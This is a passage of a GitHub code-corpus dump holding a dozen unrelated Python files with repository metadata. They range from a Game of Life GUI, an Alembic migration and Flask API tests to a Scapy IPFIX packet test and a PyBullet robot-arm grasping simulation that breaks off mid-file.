from_=10, to=50, orient=\"horizontal\", command = slider_changed, length = 500) #https://python-course.eu/tkinter/sliders-in-tkinter.php\nslider.pack()\n\nbutton = tk.Button(win, text = \"ĎALŠIA GENERÁCIA\", command = recalculate)\nbutton.pack(side = tk.RIGHT)\n\nbutton1 = tk.Button(win, text = \"OTVOR SÚBOR\", command = open_file)\nbutton1.pack(side=tk.LEFT)\n\nbutton2 = tk.Button(win, text = \"ŠTART\", command = change)\nbutton2.pack(side=tk.BOTTOM)\n\ncreate_stage()\ncanvas.bind(\"\",create_cells)\n\nwin.mainloop()\n","repo_name":"1Viki1/Game-of-life","sub_path":"Game of life .py","file_name":"Game of life .py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36396121534","text":"\"\"\"empty message\n\nRevision ID: 516c21ea7d87\nRevises: bfebc2d5c719\nCreate Date: 2022-07-02 18:10:05.689033\n\n\"\"\"\nimport sqlalchemy_utils\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '516c21ea7d87'\ndown_revision = 'bfebc2d5c719'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('metric2', sa.Column('nb_proton_premium', sa.Float(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('metric2', 'nb_proton_premium')\n # ### end Alembic commands ###\n","repo_name":"simple-login/app","sub_path":"migrations/versions/2022_070218_516c21ea7d87_.py","file_name":"2022_070218_516c21ea7d87_.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":4235,"dataset":"github-code","pt":"71"} +{"seq_id":"13762547710","text":"Lista = []\ncontinuar=True\nrepeticion=0\nwhile continuar==True:\n nombre = input(\"ingrese el nombre que desee: \")\n if nombre==\"\":# esta solo en comillas refiriendoce a que le dio enter sn ingresar nada\n continuar=False\n else:\n Lista.append(nombre)#si igreso un nombre entonces continua\nfor item in Lista:\n if Lista.count(item)>1:#count cuenta las veces que pusiste un valor en una lista, si se coloco un valor + de una vez la repeticion se le sumara uno \n repeticion+=1\nprint(Lista)\nprint(\"Se repito un nombre un total de :\",repeticion,\"veces\")","repo_name":"Francis318/Practica1_back","sub_path":"Practica10.py","file_name":"Practica10.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72957329190","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"tensorflow-fewshot\",\n version=\"0.0.3\",\n author=\"Aymeric QUESNE\",\n author_email=\"aymeric.quesne@octo.com\",\n description=\"A Python package for few shot learning training and inference in computer vision using Tensorflow.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/aymericq/tensorflow-fewshot\",\n packages=setuptools.find_packages(),\n install_requires=[\n \"numpy>=1.19.1\",\n \"tensorflow>=2.2.0\",\n \"matplotlib>=3.3.0\"\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)","repo_name":"aymericq/tensorflow-fewshot","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"35711226020","text":"#! /usr/bin/python3\nimport sys\nimport os\nimport binascii\nimport pdb\n\npaths = [\n '',\n '/nic',\n '/dol/',\n '/dol/third_party'\n]\n\nws_top = os.path.dirname(sys.argv[0]) + '/../../../'\nws_top = os.path.abspath(ws_top)\nfor path in paths:\n fullpath = ws_top + path\n print(\"Adding Path: %s\" % fullpath)\n sys.path.insert(0, fullpath)\n\nimport infra.engine.comparators as crs\nimport infra.factory.scapyfactory as scapyfactory\n\nfrom infra.penscapy.penscapy import *\nfrom infra.common.logging import logger\n\nlogger.SetLoggingLevel(7)\n\na = Ether()/IP()/UDP(sport=49000)\nipf = Ipfix()\nv4rec = IpfixRecord()/IpfixRecordIpv4Data()\nv6rec = IpfixRecord()/IpfixRecordIpv6Data()\nethrec = IpfixRecord()/IpfixRecordNonIpData()\n\nrecords = []\nrecords.append(IpfixRecord(bytes(ethrec)))\nrecords.append(IpfixRecord(bytes(v6rec)))\nrecords.append(IpfixRecord(bytes(v4rec)))\n\nipf[Ipfix].records = records\n\na = a/ipf\na.show2(indent = 0)\nhexdump(a)\n\nnewpkt = Ether(bytes(a))\nnewpkt.show(indent = 0)\n","repo_name":"ccdxc/sw","sub_path":"dol/ut/engine/ipfix.py","file_name":"ipfix.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"23083542883","text":"import devices.base.constants\n\n\nNUMBER_INPUTS: int = 4\nDEVICE_TYPE = \"DOBT\"\nSTATUS_KEY = devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + 'status'\nSUCTION_STATUS_KEY = devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + 'suction'\nINPUT_PREFIX = \"arm_\"\nX_AXIS_SUFFIX = '_x_mm'\nY_AXIS_SUFFIX = '_y_mm'\nZ_AXIS_SUFFIX = '_z_mm'\nEFFECTOR_ANGLE_SUFFIX = '_effec_ang_deg'\nTARGET_AXIS_SUFFIX = '_target'\nRAW_AXIS_SUFFIX = '_raw'\nAXES = (X_AXIS_SUFFIX, Y_AXIS_SUFFIX, Z_AXIS_SUFFIX, EFFECTOR_ANGLE_SUFFIX)\nTHETA_SUFFIX = '_theta'\nDELTA_X_SUFFIX = '_dx'\nDELTA_Y_SUFFIX = '_dy'\nZ_OFFSET_SUFFIX = '_dz'\n\nMM_XY_MAX = 328\nMM_XY_MIN = 111\n\nMM_MAX_SQ = MM_XY_MAX ** 2\nMM_MIN_SQ = MM_XY_MIN ** 2\n\nALL_IN_POSITION = 15\nOUT_OF_POSITION = 0\n\nALL_SUCTION_OFF = 0\n\nMINIMUM_VELOCITY = 100\nMAXIMUM_VELOCITY = 1000\n\nBASE = dict(\n type=DEVICE_TYPE,\n number_icons=4,\n number_decks=4,\n _number_robot_inputs=NUMBER_INPUTS,\n)\n\nBASE_DTYPES = dict(\n _number_robot_inputs=int.__name__,\n)\n\nBASE.update({\n STATUS_KEY: ALL_IN_POSITION,\n SUCTION_STATUS_KEY: ALL_SUCTION_OFF,\n})\n\nBASE_DTYPES.update({\n STATUS_KEY: int.__name__,\n SUCTION_STATUS_KEY: int.__name__,\n})\n\nfor i in range(0, NUMBER_INPUTS):\n BASE.update({\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + X_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + Y_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + Z_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + EFFECTOR_ANGLE_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + X_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + Y_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + Z_AXIS_SUFFIX: 0,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + EFFECTOR_ANGLE_SUFFIX: 0,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + X_AXIS_SUFFIX: 0,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + Y_AXIS_SUFFIX: 0,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + Z_AXIS_SUFFIX: 0,\n INPUT_PREFIX + str(i) + THETA_SUFFIX: 0,\n INPUT_PREFIX + str(i) + DELTA_X_SUFFIX: 0,\n INPUT_PREFIX + str(i) + DELTA_Y_SUFFIX: 0,\n INPUT_PREFIX + str(i) + DELTA_Y_SUFFIX: 0,\n INPUT_PREFIX + str(i) + Z_OFFSET_SUFFIX: 0,\n })\n BASE_DTYPES.update({\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + X_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + Y_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + Z_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + EFFECTOR_ANGLE_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + X_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + Y_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + Z_AXIS_SUFFIX: str.__name__,\n devices.base.constants.DEVICE_GLOBAL_PARAM_PREFIX + INPUT_PREFIX + str(i) + TARGET_AXIS_SUFFIX + EFFECTOR_ANGLE_SUFFIX: str.__name__,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + X_AXIS_SUFFIX: str.__name__,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + Y_AXIS_SUFFIX: str.__name__,\n INPUT_PREFIX + str(i) + RAW_AXIS_SUFFIX + Z_AXIS_SUFFIX: str.__name__,\n INPUT_PREFIX + str(i) + THETA_SUFFIX: float.__name__,\n INPUT_PREFIX + str(i) + DELTA_X_SUFFIX: float.__name__,\n INPUT_PREFIX + str(i) + DELTA_Y_SUFFIX: float.__name__,\n INPUT_PREFIX + str(i) + Z_OFFSET_SUFFIX: float.__name__,\n })\n\nBASE = {**devices.base.constants.BASE, **BASE}\nBASE_DTYPES = {**devices.base.constants.BASE_DTYPES, **BASE_DTYPES}\n\nDISPLAY_NAME = \"Dobot Arm (\" + DEVICE_TYPE + \")\"\n\nCATEGORY = \"Robots\"\n\nMOVE_JUMP_MODE = 0\nMOVE_JOINT_MODE = 1\nMOVE_LINEAR_MODE = 2\n\nNUMBER_DECKS = 4\n\nX_GRID_SIZE_MM = 35.\nY_GRID_SIZE_MM = 35.\n\n# center of square\nA1_X_MM = -280.0\nA1_Y_MM = -152.5\n\n# center of square\nI14_X_MM = 0.\nI14_Y_MM = 302.5\n\n# center of square\nQ2_X_MM = 280.\nQ2_Y_MM = -117.5\n\nDECK_GENERATOR = (\n (\"A\", (2, 9)),\n (\"B\", (1, 10)),\n (\"C\", (1, 11)),\n (\"D\", (2, 12)),\n (\"E\", (9, 13)),\n (\"F\", (10, 13)),\n (\"G\", (10, 14)),\n (\"H\", (10, 14)),\n (\"I\", (10, 14)),\n (\"J\", (10, 14)),\n (\"K\", (10, 14)),\n (\"L\", (10, 13)),\n (\"M\", (9, 13)),\n (\"N\", (2, 12)),\n (\"O\", (1, 11)),\n (\"P\", (1, 10)),\n (\"Q\", (2, 9)),\n)\n\n\nDEFAULT_THETA = 0\nDEFAULT_DELTA_X = 0\nDEFAULT_DELTA_Y = 0\n\ndel i\n","repo_name":"aqueductfluidics/example_projects","sub_path":"devices/aqueduct/dobt/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"69945838950","text":"#!/usr/bin/python\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom plot.plotting_utilities import *\n\nhatces = ['x', '\\\\', '/']\ncolors = ['.25', '.5', '.75']\n\nhome = '/afs/cern.ch/work/k/kiliakis/git/cpu-gpu-bench/'\nres_file = home + 'results/fftconvolve/matrixconvolve-bench-v2.csv'\nimages_dir = home + 'results/fftconvolve/'\nimage_name = 'matrixconvolve-bench-v3.pdf'\n\ny_label = 'Normalized Thoughput'\nx_label = 'Signal Size'\n# plot_title = 'FFT Convolution'\n# plot_title = 'lin_interp_kick'\ntitle = 'Matrix FFT Convolution'\ngrouping = ['function']\nprefixes = ['']\nkeeponly = ['n_points', 'turn_time']\nx_lims = []\ny_lims = []\n\nnames = {'matrixconvolve_cpu_v2': 'CPU Complex Convolution',\n 'matrixconvolve_cpu_v0': 'CPU Real Convolution',\n 'matrixconvolve_gpu_v1': 'Tesla K20X Complex Convolution',\n 'matrixconvolve_gpu_p100': 'Pascal P100 Complex Convolution'}\n\nopacity = 0.85\nwidth = 0.35\n# start = -width/2\nstart = 0\n\nshow = 0\n\nif __name__ == '__main__':\n\n data = np.genfromtxt(res_file, dtype=str)\n header = data[0].tolist()\n data = data[1:]\n all_plots = group_by(header, data, grouping, prefixes)\n # version = file.split('.csv')[0]\n all_plots = keep_only(header, all_plots, keeponly)\n print(all_plots)\n\n plt.figure()\n plt.grid(True, which='major', alpha=0.5)\n # plt.tick_params(labelright=True)\n plt.xlabel(x_label)\n if(x_lims):\n plt.xlim(x_lims)\n if(y_lims):\n plt.ylim(y_lims)\n\n plt.title(title)\n plt.ylabel(y_label)\n\n normalize = np.array(all_plots['matrixconvolve_gpu_v1'][1], float)\n\n for plot_name, plots in all_plots.items():\n if 'gpu' not in plot_name:\n continue\n N = len(plots[0])+1\n ind = np.linspace(0, N, N)\n # plt.figure(figsize=(6, 3))\n\n # define the starting position and the way the bars will be arranged\n\n # plots.sort(key=lambda a: a[0])\n label = plot_name\n if label in names:\n label = names[label]\n x = np.array(plots[0], dtype=int)\n y = normalize / np.array(plots[1], dtype=float)\n y = np.append(y, [np.mean(y)])\n p = plt.bar(ind + start, y, width, label=label, alpha=opacity)\n autolabel(plt.gca(), p, rounding=2, fontsize=8)\n start += width\n x = [human_format(i) for i in x]\n plt.xticks(ind+width/2, x + ['Average'])\n\n # normalize = np.array(all_plots['matrixconvolve_cpu_v2'][1], float)\n # label = 'P100 / CPU Complex'\n # y = normalize / np.array(all_plots['matrixconvolve_gpu_p100'][1], float)\n # y = np.append(y, [np.mean(y)])\n # p = plt.bar(ind + start - width, y, width, label=label, alpha=opacity)\n\n # autolabel(plt.gca(), p, rounding=2, fontsize=8.5)\n\n plt.legend(loc='center left', fancybox=True, framealpha=0.5, fontsize=10,\n bbox_to_anchor=(0., 0.6))\n plt.tight_layout()\n if show:\n plt.show()\n else:\n plt.savefig(images_dir + image_name, dpi=300)\n plt.close()\n\n # autolabel(simple)\n # autolabel(batched)\n","repo_name":"kiliakis/cuda-fft-convolution","sub_path":"scripts/plots/plot_bars.py","file_name":"plot_bars.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"23926247253","text":"import ifcopenshell\nimport ifcopenshell.api\n\n\nclass Usecase:\n def __init__(self, file, related_object=None):\n \"\"\"Unassigns a type of an occurrence\n\n :param related_object: The IfcElement occurrence.\n :type related_object: ifcopenshell.entity_instance.entity_instance\n :return: None\n :rtype: None\n\n Example:\n\n .. code:: python\n\n # A furniture type. This would correlate to a particular model in a\n # manufacturer's catalogue. Like an Ikea sofa :)\n furniture_type = ifcopenshell.api.run(\"root.create_entity\", model,\n ifc_class=\"IfcFurnitureType\", name=\"FUN01\")\n\n # An individual occurrence of a that sofa.\n furniture = ifcopenshell.api.run(\"root.create_entity\", model, ifc_class=\"IfcFurniture\")\n\n # Assign the furniture to the furniture type.\n ifcopenshell.api.run(\"type.assign_type\", model, related_object=furniture, relating_type=furniture_type)\n\n # Change our mind. Maybe it's a different type?\n ifcopenshell.api.run(\"type.unassign_type\", model, related_object=furniture)\n \"\"\"\n self.file = file\n self.settings = {\"related_object\": related_object}\n\n def execute(self):\n if self.file.schema == \"IFC2X3\":\n is_typed_by = None\n is_defined_by = self.settings[\"related_object\"].IsDefinedBy\n for rel in is_defined_by:\n if rel.is_a(\"IfcRelDefinesByType\"):\n is_typed_by = rel\n else:\n is_typed_by = self.settings[\"related_object\"].IsTypedBy\n if is_typed_by:\n is_typed_by = is_typed_by[0]\n\n if is_typed_by:\n related_objects = list(is_typed_by.RelatedObjects)\n related_objects.remove(self.settings[\"related_object\"])\n if related_objects:\n is_typed_by.RelatedObjects = related_objects\n ifcopenshell.api.run(\"owner.update_owner_history\", self.file, **{\"element\": is_typed_by})\n else:\n self.file.remove(is_typed_by)\n","repo_name":"IfcOpenShell/IfcOpenShell","sub_path":"src/ifcopenshell-python/ifcopenshell/api/type/unassign_type.py","file_name":"unassign_type.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"71"} +{"seq_id":"23177378061","text":"from django.contrib import admin\nfrom django.contrib.gis.admin import OSMGeoAdmin\nfrom rgd.admin.mixins import (\n MODIFIABLE_FILTERS,\n TASK_EVENT_FILTERS,\n TASK_EVENT_READONLY,\n GeoAdminInline,\n _FileGetNameMixin,\n reprocess,\n)\nfrom rgd_fmv.models import FMV, FMVMeta\n\n\nclass FMVMetaInline(GeoAdminInline):\n model = FMVMeta\n fk_name = 'fmv_file'\n list_display = (\n 'pk',\n 'fmv_file',\n 'modified',\n 'created',\n )\n readonly_fields = (\n 'modified',\n 'created',\n 'fmv_file',\n )\n\n\n@admin.register(FMV)\nclass FMVAdmin(OSMGeoAdmin, _FileGetNameMixin):\n list_display = (\n 'pk',\n 'get_name',\n 'status',\n 'modified',\n 'created',\n 'fmv_data_link',\n 'klv_data_link',\n )\n readonly_fields = (\n 'modified',\n 'created',\n 'klv_file',\n 'web_video_file',\n 'frame_rate',\n ) + TASK_EVENT_READONLY\n inlines = (FMVMetaInline,)\n actions = (reprocess,)\n list_filter = MODIFIABLE_FILTERS + TASK_EVENT_FILTERS\n raw_id_fields = ('file',)\n","repo_name":"ResonantGeoData/ResonantGeoData","sub_path":"django-rgd-fmv/rgd_fmv/admin/fmv.py","file_name":"fmv.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"71"} +{"seq_id":"20839057899","text":"# tests/test_views.py\nfrom flask_testing import TestCase\nfrom wsgi import app\n\nclass TestViews(TestCase):\n def create_app(self):\n app.config['TESTING'] = True\n return app\n\n def test_products_json(self):\n response = self.client.get(\"/api/v1/products\")\n products = response.json\n self.assertIsInstance(products, list)\n self.assertGreater(len(products), 2) # 2 is not a mistake here.\n\n def test_product_found(self):\n response = self.client.get(\"/api/v1/products/1\")\n print(response.status_code)\n product = response.json\n self.assertIsInstance(product, dict)\n self.assertEqual(product.get('id'), 1)\n\n def test_product_not_found(self):\n response = self.client.get(\"/api/v1/products/4\")\n print(response.status_code)\n product = response.json\n self.assertEqual(product, None)\n\n def test_product_delete(self):\n response = self.client.get(\"/api/v1/products/1\")\n print(\"code retour delete: \" + str(response.status_code))\n","repo_name":"vulocke/apirest","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26554506458","text":"import torch\nimport torch.nn as nn\n\nfrom time_embedding import TimeEmbedding\n\n\nclass ModelTest(nn.Module):\n def __init__(self, **kwargs):\n super(ModelTest, self).__init__()\n self.time_emb = TimeEmbedding(20,64)\n\n def forward(self, input1):\n emb = self.time_emb(input1)\n return emb\n\n\nif __name__ == '__main__':\n model = ModelTest()\n\n x = torch.randn([10,20]).unsqueeze(2)\n results = model(x)\n \n assert results.shape == torch.Size([10, 20, 64])","repo_name":"marlesson/time-dependant-rnn-embeddings-pytorch","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"2094174972","text":"from concurrent.futures import thread\nfrom typing import Tuple, List, Optional, Dict\nimport time\nimport numpy as np\nfrom pathlib import Path\nimport pybullet as pb\nimport pybullet_data\n\nROBOT_BASE_POSITION = (0, 0, 0)\nBALL_START_POSITION = (0.25, 0.5, 0.05)\nCAMERA_TARGET_POSITION = BALL_START_POSITION\nCAMERA_DISTANCE = 0.8\nBALL_MASS = 1\nALPHA = 300\n\nPARAMETERS_DIR = Path(__file__).parent / \"calibration\" / \"parameters\"\nCAMERA_MATRIX_PATH = str(PARAMETERS_DIR / \"mtx.npy\")\nDISTORTION_MATRIX_PATH = str(PARAMETERS_DIR / \"dist.npy\")\n\nclass RobotArm:\n GRIPPER_CLOSED = 0.\n GRIPPER_OPENED = 1.\n def __init__(self):\n '''Robot Arm simulated in Pybullet, with support for performing top-down\n grasps within a specified workspace\n '''\n # placing robot higher above ground improves top-down grasping ability\n self._id = pb.loadURDF(\"assets/urdf/xarm.urdf\",\n basePosition=ROBOT_BASE_POSITION,\n flags=pb.URDF_USE_SELF_COLLISION)\n\n # these are hard coded based on how urdf is written\n self.arm_joint_ids = [1,2,3,4,5]\n self.gripper_joint_ids = [6,7]\n self.dummy_joint_ids = [8]\n self.finger_joint_ids = [9,10]\n self.end_effector_link_index = 11\n\n self.arm_joint_limits = np.array(((-2, -1.58, -2, -1.8, -2),\n ( 2, 1.58, 2, 2.0, 2)))\n # Don't open the gripper as much\n self.gripper_joint_limits = np.array(((0.075,0.075),\n (0.25, 0.25)))\n\n # chosen to move arm out of view of camera\n self.home_arm_jpos = [0., -1.1, 1.4, 1.3, 0.]\n\n # joint constraints are needed for four-bar linkage in xarm fingers\n for i in [0,1]:\n constraint = pb.createConstraint(self._id,\n self.gripper_joint_ids[i],\n self._id,\n self.finger_joint_ids[i],\n pb.JOINT_POINT2POINT,\n (0,0,0),\n (0,0,0.03),\n (0,0,0))\n pb.changeConstraint(constraint, maxForce=1000000)\n\n # reset joints in hand so that constraints are satisfied\n hand_joint_ids = self.gripper_joint_ids + self.dummy_joint_ids + self.finger_joint_ids\n hand_rest_states = [0.05, 0.05, 0.055, 0.0155, 0.031]\n [pb.resetJointState(self._id, j_id, jpos)\n for j_id,jpos in zip(hand_joint_ids, hand_rest_states)]\n\n # allow finger and linkages to move freely\n pb.setJointMotorControlArray(self._id,\n self.dummy_joint_ids+self.finger_joint_ids,\n pb.POSITION_CONTROL,\n forces=[0,0,0])\n\n def move_gripper_to(self, position: List[float], theta: float):\n '''Commands motors to move end effector to desired position, oriented\n downwards with a rotation of theta about z-axis\n\n Parameters\n ----------\n position\n xyz position that end effector should move toward\n theta\n rotation (in radians) of the gripper about the z-axis.\n\n Returns\n -------\n bool\n True if movement is successful, False otherwise.\n '''\n quat = pb.getQuaternionFromEuler((0,-np.pi,theta))\n arm_jpos, _ = self.solve_ik(position, quat)\n\n return self.move_arm_to_jpos(arm_jpos)\n\n def solve_ik(self,\n pos: List[float],\n quat: Optional[List[float]]=None,\n ) -> Tuple[List[float], Dict[str, float]]:\n '''Calculates inverse kinematics solution for a desired end effector\n position and (optionally) orientation, and returns residuals\n\n Hint\n ----\n To calculate residuals, you can get the pose of the end effector link using\n `pybullet.getLinkState` (but you need to set the arm joint positions first)\n\n Parameters\n ----------\n pos\n target xyz position of end effector\n quat\n target orientation of end effector as unit quaternion if specified.\n otherwise, ik solution ignores final orientation\n\n Returns\n -------\n list\n joint positions of arm that would result in desired end effector\n position and orientation. in order from base to wrist\n dict\n position and orientation residuals:\n {'position' : || pos - achieved_pos ||,\n 'orientation' : 1 - ||}\n '''\n n_joints = pb.getNumJoints(self._id)\n all_jpos = pb.calculateInverseKinematics(self._id,\n self.end_effector_link_index,\n pos,\n quat,\n maxNumIterations=20,\n jointDamping=n_joints*[0.005])\n arm_jpos = all_jpos[:len(self.arm_joint_ids)]\n\n # teleport arm to check acheived pos and orientation\n old_arm_jpos = list(zip(*pb.getJointStates(self._id, self.arm_joint_ids)))[0]\n [pb.resetJointState(self._id, i, jp) for i,jp in zip(self.arm_joint_ids, arm_jpos)]\n achieved_pos, achieved_quat = pb.getLinkState(self._id, self.end_effector_link_index)[:2]\n [pb.resetJointState(self._id, i, jp) for i,jp in zip(self.arm_joint_ids, old_arm_jpos)]\n\n residuals = {'position' : np.linalg.norm(np.subtract(pos, achieved_pos)),\n 'orientation' : 1 - np.abs(np.dot(quat, achieved_quat))}\n\n return arm_jpos, residuals\n\n def move_arm_to_jpos(self, arm_jpos: List[float]) -> bool:\n '''Commands motors to move arm to desired joint positions\n\n Parameters\n ----------\n arm_jpos\n joint positions (radians) of arm joints, ordered from base to wrist\n\n Returns\n -------\n bool\n True if movement is successful, False otherwise.\n '''\n # cannot use setJointMotorControlArray because API does not expose\n # maxVelocity argument, which is needed for stable object manipulation\n for j_id, jpos in zip(self.arm_joint_ids, arm_jpos):\n pb.setJointMotorControl2(self._id,\n j_id,\n pb.POSITION_CONTROL,\n jpos,\n positionGain=0.2,\n maxVelocity=0.8)\n\n return self.monitor_movement(arm_jpos, self.arm_joint_ids)\n\n def set_gripper_state(self, gripper_state: float) -> bool:\n '''Commands motors to move gripper to given state\n\n Parameters\n ----------\n gripper_state\n gripper state is a continuous number from 0. (fully closed)\n to 1. (fully open)\n\n Returns\n -------\n bool\n True if movement is successful, False otherwise.\n\n Raises\n ------\n AssertionError\n If `gripper_state` is outside the range [0,1]\n '''\n assert 0 <= gripper_state <= 1, 'Gripper state must be in range [0,1]'\n\n gripper_jpos = (1-gripper_state)*self.gripper_joint_limits[0] \\\n + gripper_state*self.gripper_joint_limits[1]\n\n pb.setJointMotorControlArray(self._id,\n self.gripper_joint_ids,\n pb.POSITION_CONTROL,\n gripper_jpos,\n positionGains=[0.2, 0.2])\n\n success = self.monitor_movement(gripper_jpos, self.gripper_joint_ids)\n return success\n\n def monitor_movement(self,\n target_jpos: List[float],\n joint_ids: List[int],\n ) -> bool:\n '''Monitors movement of motors to detect early stoppage or success.\n\n Note\n ----\n Current implementation calls `pybullet.stepSimulation`, without which the\n simulator will not move the motors. You can avoid this by setting\n `pybullet.setRealTimeSimulation(True)` but this is usually not advised.\n\n Parameters\n ----------\n target_jpos\n final joint positions that motors are moving toward\n joint_ids\n the joint ids associated with each `target_jpos`, used to read out\n the joint state during movement\n\n Returns\n -------\n bool\n True if movement is successful, False otherwise.\n '''\n old_jpos = list(zip(*pb.getJointStates(self._id, joint_ids)))[0]\n while True:\n [pb.stepSimulation() for _ in range(10)]\n\n time.sleep(0.01)\n\n achieved_jpos = list(zip(*pb.getJointStates(self._id, joint_ids)))[0]\n if np.allclose(target_jpos, achieved_jpos, atol=1e-3):\n # success\n return True\n\n if np.allclose(achieved_jpos, old_jpos, atol=1e-3):\n # movement stopped\n return False\n old_jpos = achieved_jpos\n\n\nclass Camera:\n def __init__(self) -> None:\n '''Camera that is mounted to view workspace from above\n '''\n self.img_width = 1440\n self.img_height = 960\n\n self.view_mtx = pb.computeViewMatrixFromYawPitchRoll(\n cameraTargetPosition=CAMERA_TARGET_POSITION,\n distance=CAMERA_DISTANCE,\n roll=0,\n pitch=0,\n yaw=0,\n upAxisIndex=2\n )\n\n \n camera_vis_id = pb.createVisualShape(pb.GEOM_BOX,\n halfExtents=[0.02, 0.05, 0.02],\n rgbaColor=[0,0,0,0.1])\n camera_body = pb.createMultiBody(0, -1, camera_vis_id)\n\n view_mtx = np.array(self.view_mtx).reshape((4,4),order='F')\n cam_pos = np.dot(view_mtx[:3,:3].T, -view_mtx[:3,3])\n cam_euler = np.array([0, 0, 0])\n cam_quat = pb.getQuaternionFromEuler(cam_euler)\n pb.resetBasePositionAndOrientation(camera_body, cam_pos, cam_quat)\n\n self.camera_mtx = np.load(CAMERA_MATRIX_PATH)\n self.dist_mtx = np.load(DISTORTION_MATRIX_PATH)\n cam_fov = np.degrees(2 * np.arctan2(self.img_height, 2 * self.camera_mtx[1, 1]))\n self.proj_mtx = pb.computeProjectionMatrixFOV(fov=cam_fov,\n aspect=1,\n nearVal=0.01,\n farVal=1)\n\n def get_rgb_image(self) -> np.ndarray:\n '''Takes rgb image\n\n Returns\n -------\n np.ndarray\n shape (H,W,3) with dtype=np.uint8\n '''\n rgba = pb.getCameraImage(width=self.img_width,\n height=self.img_height,\n viewMatrix=self.view_mtx,\n projectionMatrix=self.proj_mtx,\n renderer=pb.ER_TINY_RENDERER)[2]\n\n return rgba[...,:3]\n\n\nclass GraspingEnv:\n def __init__(self, render: bool=True) -> None:\n '''Pybullet simulator with robot that performs top down grasps of a\n single object. A camera is positioned to take images of workspace\n from above.\n '''\n self.client = pb.connect(pb.GUI if render else pb.DIRECT)\n pb.setPhysicsEngineParameter(numSubSteps=0,\n numSolverIterations=100,\n solverResidualThreshold=1e-7,\n constraintSolverType=pb.CONSTRAINT_SOLVER_LCP_SI)\n pb.setGravity(0,0,-10)\n\n # create ground plane\n pb.setAdditionalSearchPath(pybullet_data.getDataPath())\n # offset plane y-dim to place white tile under workspace\n self.plane_id = pb.loadURDF('plane.urdf', 